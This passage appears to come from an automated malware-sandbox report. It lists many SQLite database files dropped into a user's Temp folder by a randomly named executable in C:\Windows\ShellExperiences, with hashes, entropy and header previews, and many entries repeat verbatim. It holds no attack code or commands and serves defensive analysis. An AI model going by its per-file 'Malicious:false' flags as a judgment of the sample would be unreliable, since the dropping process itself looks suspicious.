                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\sa8E2cujZM

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\siBpITa5lI

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\t6shThA6zP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\tIYtMEVAJY

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\tNAFEB6DLp

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\tYfOQxqC7a

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\tdmQMKtYUV

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ttDkjVfYqn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\tyqYfnSjj5

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\uFhIiC0gUV

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\uKmDOfYZKP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\uO5wNHPNLS

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\uRNPQtq9wF

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\vA84Ml1QBK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\vGwGgKYG4C

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\vHe1bdeKDt

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\vKMSHPQtPE

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\vWXbycFBuu

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\vYGcHlJcAT

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\w3lXMMJotn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\w7EdVUSGUy

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wLhMmWkE9p

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wOkQSrkZ9L

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
